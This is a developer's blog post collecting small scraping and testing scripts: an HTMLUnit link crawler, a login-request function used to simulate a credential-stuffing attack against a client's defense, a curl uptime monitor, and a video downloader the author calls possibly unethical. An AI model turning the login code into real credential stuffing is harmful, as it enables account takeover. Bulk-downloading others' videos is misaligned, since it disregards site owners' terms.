Web Scrape Examples

Over the years, I've built a collection of small scripts that I use to crawl and fetch data for myself. These are all pretty hacky and quick, but I often find useful.

Scrape to MySql

This particular script was used to pull links off a page at work. Every hour it will crawl a page and collect domains. The domains themselfs act as primay keys, and prevents duplicates. This is a good example of how to use HTMLUnit to fetch data.

Git Hub Link

public void runMe() {

	try {

		webClient = new WebClient(BrowserVersion.FIREFOX_38);
		//webClient.getOptions().setThrowExceptionOnScriptError(false);
		page = webClient.getPage(url);
		
		//scrollToBottomOfPage();
		
		final List<?> sectionPlayers = page.getByXPath("(//div[@class='section-asdf'])");									//get all section players on page
		
	   for (int i = 0; i < sectionPlayers.size(); i++) {																	//loop through them
		   System.out.println("NAWICE... Lets get the asdf links!");
		   HtmlDivision htmlDivision = (HtmlDivision) sectionPlayers.get(i);
		   if( htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf").size() == 1) {							//more than one blog posted
			   
			   List repostLink = htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf");				//get the link to show posts
			   repostLink.get(0).click();																						
			   webClient.waitForBackgroundJavaScript(5000);																		//wait for the ajax page to reload
			   printLinksInSectionPlayer(htmlDivision);																			//print the new visible links																	
			   
			   List showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-asdf");				//get the show more link
			   if ( showMoreLink.size() == 1) {																					//if we have a show more link...
				   showMoreLink.get(0).click();																					//click it
				   webClient.waitForBackgroundJavaScript(5000);																	//wait for the ajax
				   printLinksInSectionPlayer(htmlDivision);																		//print the new visible links
				   
				   while (htmlDivision.getElementsByAttribute("a", "class", "fav-asdf").size() == 2) {						//if there are two links we have a next and prev button
					   showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-paging");							//get the next and prev buttons
					   showMoreLink.get(1).click();																				//click the next button
					   webClient.waitForBackgroundJavaScript(5000);
					   printLinksInSectionPlayer(htmlDivision);																	//print the links
				   }
			   }
		   }
		   else {
			   printLinksInSectionPlayer(htmlDivision);																		//only one blog post this print it
		   }
	   }
		
		webClient.closeAllWindows();
	} catch (Exception e) {
		System.out.println("Welp, something went wrong...");
		e.printStackTrace();
	}
	
	System.out.println("DING! Toast is done!");
}

Credential Stuffing

After the Yahoo! email security breech, we discovered automated scripts using credential stuffing methods to access a client's domain. Here I wrote a similar attack, and used it as a test case to prove our solution worked. Here's a sampe of it.

GitHub Link

    private String getAuthToken(String username, String password) throws Exception {

        String url = "https://" + endpointPrefix + ".example.com/j_spring_security_check";
        URL obj = new URL(url);
        HttpURLConnection con = (HttpURLConnection) obj.openConnection();
        con.setInstanceFollowRedirects(false);

        //add reuqest header
        con.setRequestMethod("POST");

        String urlParameters = "j_username=" + username + "&j_password=" + password;

        // Send post request
        con.setDoOutput(true);
        DataOutputStream wr = new DataOutputStream(con.getOutputStream());
        wr.writeBytes(urlParameters);
        wr.flush();
        wr.close();

        printTheRequest(con);

        String authToken = "";
        List cookiesHeaders = con.getHeaderFields().get("Set-Cookie");
        for (String cookieHeader : cookiesHeaders) {
            HttpCookie cookie = HttpCookie.parse(cookieHeader).get(0);
            if ( cookie.getName().equals("EXAMPLE_WD_WLJSESSIONID") ) {
                authToken = cookie.getValue();
            }

        }

        return authToken;

    }

Monitor URL

This little bash script comes in handy when you're trying to prove a url is inconsistenly loading. Every 10 minutes I use curl to visit a page and print it's response code. In the case of this issue, our server had a different DNS server than our firewall, and recived an IP address to connect to that was not opened.

#!/bin/bash


# I often use this script to monitor connectivity.  The output
# can be sent to your infrastructure team to prove a point...

while [ 1 ]
do

    echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
    echo `date` >> jm_watch_url.txt
    echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
    curl -v https://www.google.com/recaptcha/api/siteverify 2>&1 | tee -a jm_watch_url.txt
    sleep 1200

done

Video Scaping

Alright, maybe this one isn't all that ethical. I came across a series of videos online but the were buried in just about the worst online adds. This script was used to pull a list of all the urls, and store them in a local in memory database (actually persisted to your local disk). This meant I could shut down the script and allow it to resume downloading the videos laters. It also means I didn't have to restart from video one if something went wrong.

GitHub Link

    @Bean
    public CommandLineRunner commandLineRunner(ApplicationContext ctx) throws Exception {

        //GetWebsiteB getWebsiteB = ctx.getBean(GetWebsiteB.class);
        //getWebsiteB.gatherLinks();
        //getWebsiteB.downloadLinks();

        GetWebsiteA getWebsiteA = ctx.getBean(GetWebsiteA.class);
        getWebsiteA.gatherLinks();
        getWebsiteA.downloadLinks();

        return null;
    }